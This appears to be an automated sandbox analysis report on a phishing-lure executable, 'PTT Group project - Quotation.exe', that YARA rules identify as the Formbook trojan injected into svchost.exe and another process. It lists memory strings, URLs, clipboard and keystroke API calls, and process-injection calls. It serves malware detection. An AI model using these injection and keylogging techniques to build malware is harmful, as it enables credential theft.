Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RMActivate_ssp.exe, 00000003.00000003.1943583969.0000000007DD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://track.uc.cn/collect
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000003D54000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://v-cn.vaptcha.com/v3.js
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000003D54000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.livechat.com/?welcome
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000003D54000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.livechat.com/chat-with/14282961/
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0098425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_0098425A
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00984458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00984458
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0098425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_0098425A
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00970219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00970219
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0099CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0099CDAC

E-Banking Fraud

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: This is a third-party compiled AutoIt script. 0_2_00913B4C
Source: PTT Group project - Quotation.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PTT Group project - Quotation.exe, 00000000.00000000.1639356848.00000000009C5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_39eed2da-6
Source: PTT Group project - Quotation.exe, 00000000.00000000.1639356848.00000000009C5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_763a666a-c
Source: PTT Group project - Quotation.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_8ffd7825-5
Source: PTT Group project - Quotation.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8fbf1156-6
Source: initial sample Static PE information: Filename: PTT Group project - Quotation.exe
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042B003 NtClose, 1_2_0042B003
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872B60 NtClose,LdrInitializeThunk, 1_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk, 1_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk, 1_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03874340 NtSetContextThread, 1_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03874650 NtSuspendThread, 1_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872B80 NtQueryInformationFile, 1_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872BA0 NtEnumerateValueKey, 1_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872BE0 NtQueryValueKey, 1_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872BF0 NtAllocateVirtualMemory, 1_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872AB0 NtWaitForSingleObject, 1_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872AD0 NtReadFile, 1_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872AF0 NtWriteFile, 1_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872F90 NtProtectVirtualMemory, 1_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872FA0 NtQuerySection, 1_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872FB0 NtResumeThread, 1_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872FE0 NtCreateFile, 1_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872F30 NtCreateSection, 1_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872F60 NtCreateProcessEx, 1_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872E80 NtReadVirtualMemory, 1_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872EA0 NtAdjustPrivilegesToken, 1_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872EE0 NtQueueApcThread, 1_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872E30 NtWriteVirtualMemory, 1_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872DB0 NtEnumerateKey, 1_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872DD0 NtDelayExecution, 1_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872D00 NtSetInformationFile, 1_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872D10 NtMapViewOfSection, 1_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872D30 NtUnmapViewOfSection, 1_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872CA0 NtQueryInformationToken, 1_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872CC0 NtQueryVirtualMemory, 1_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872CF0 NtOpenProcess, 1_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872C00 NtQueryInformationProcess, 1_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872C60 NtCreateKey, 1_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872C70 NtFreeVirtualMemory, 1_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03873090 NtSetValueKey, 1_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03873010 NtOpenDirectoryObject, 1_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038739B0 NtGetContextThread, 1_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03873D10 NtOpenProcessToken, 1_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03873D70 NtOpenThread, 1_2_03873D70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B4340 NtSetContextThread,LdrInitializeThunk, 3_2_033B4340
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B4650 NtSuspendThread,LdrInitializeThunk, 3_2_033B4650
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2B60 NtClose,LdrInitializeThunk, 3_2_033B2B60
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2BA0 NtEnumerateValueKey,LdrInitializeThunk, 3_2_033B2BA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_033B2BF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2BE0 NtQueryValueKey,LdrInitializeThunk, 3_2_033B2BE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2AF0 NtWriteFile,LdrInitializeThunk, 3_2_033B2AF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2AD0 NtReadFile,LdrInitializeThunk, 3_2_033B2AD0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2F30 NtCreateSection,LdrInitializeThunk, 3_2_033B2F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2FB0 NtResumeThread,LdrInitializeThunk, 3_2_033B2FB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2FE0 NtCreateFile,LdrInitializeThunk, 3_2_033B2FE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2E80 NtReadVirtualMemory,LdrInitializeThunk, 3_2_033B2E80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2EE0 NtQueueApcThread,LdrInitializeThunk, 3_2_033B2EE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2D30 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_033B2D30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2D10 NtMapViewOfSection,LdrInitializeThunk, 3_2_033B2D10
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_033B2DF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2DD0 NtDelayExecution,LdrInitializeThunk, 3_2_033B2DD0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_033B2C70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2C60 NtCreateKey,LdrInitializeThunk, 3_2_033B2C60
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2CA0 NtQueryInformationToken,LdrInitializeThunk, 3_2_033B2CA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B35C0 NtCreateMutant,LdrInitializeThunk, 3_2_033B35C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B39B0 NtGetContextThread,LdrInitializeThunk, 3_2_033B39B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2B80 NtQueryInformationFile, 3_2_033B2B80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2AB0 NtWaitForSingleObject, 3_2_033B2AB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2F60 NtCreateProcessEx, 3_2_033B2F60
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2FA0 NtQuerySection, 3_2_033B2FA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2F90 NtProtectVirtualMemory, 3_2_033B2F90
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2E30 NtWriteVirtualMemory, 3_2_033B2E30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2EA0 NtAdjustPrivilegesToken, 3_2_033B2EA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2D00 NtSetInformationFile, 3_2_033B2D00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2DB0 NtEnumerateKey, 3_2_033B2DB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2C00 NtQueryInformationProcess, 3_2_033B2C00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2CF0 NtOpenProcess, 3_2_033B2CF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B2CC0 NtQueryVirtualMemory, 3_2_033B2CC0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B3010 NtOpenDirectoryObject, 3_2_033B3010
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B3090 NtSetValueKey, 3_2_033B3090
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B3D10 NtOpenProcessToken, 3_2_033B3D10
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B3D70 NtOpenThread, 3_2_033B3D70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029C7BE0 NtDeleteFile, 3_2_029C7BE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029C7B00 NtReadFile, 3_2_029C7B00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029C79A0 NtCreateFile, 3_2_029C79A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029C7C70 NtClose, 3_2_029C7C70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029C7DC0 NtAllocateVirtualMemory, 3_2_029C7DC0
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009740B1: CreateFileW,_memset,DeviceIoControl,CloseHandle, 0_2_009740B1
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00968858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00968858
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_0097545F
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0091E800 0_2_0091E800
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093DBB5 0_2_0093DBB5
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0099804A 0_2_0099804A
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0091E060 0_2_0091E060
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00924140 0_2_00924140
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00932405 0_2_00932405
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00946522 0_2_00946522
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0094267E 0_2_0094267E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00990665 0_2_00990665
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093283A 0_2_0093283A
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00926843 0_2_00926843
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009489DF 0_2_009489DF
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00946A94 0_2_00946A94
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00990AE2 0_2_00990AE2
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00928A0E 0_2_00928A0E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00978B13 0_2_00978B13
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0096EB07 0_2_0096EB07
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093CD61 0_2_0093CD61
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00947006 0_2_00947006
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00923190 0_2_00923190
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0092710E 0_2_0092710E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00911287 0_2_00911287
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009333C7 0_2_009333C7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093F419 0_2_0093F419
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00925680 0_2_00925680
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009316C4 0_2_009316C4
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009378D3 0_2_009378D3
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009258C0 0_2_009258C0
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00931BB8 0_2_00931BB8
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00949D05 0_2_00949D05
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0091FE40 0_2_0091FE40
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00931FD0 0_2_00931FD0
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093BFE6 0_2_0093BFE6
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00873630 0_2_00873630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401000 1_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E16B 1_2_0040E16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401170 1_2_00401170
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403110 1_2_00403110
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004021D0 1_2_004021D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004019A0 1_2_004019A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E25E 1_2_0040E25E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042D433 1_2_0042D433
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FCEC 1_2_0040FCEC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FCF3 1_2_0040FCF3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004024A4 1_2_004024A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004024B0 1_2_004024B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004165FE 1_2_004165FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416603 1_2_00416603
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FF13 1_2_0040FF13
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040DF93 1_2_0040DF93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039003E6 1_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FA352 1_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C02C0 1_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F41A2 1_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039001AA 1_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F81CC 1_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03830100 1_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C8158 1_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383C7C0 1_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03864750 1_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840770 1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385C6E0 1_2_0385C6E0
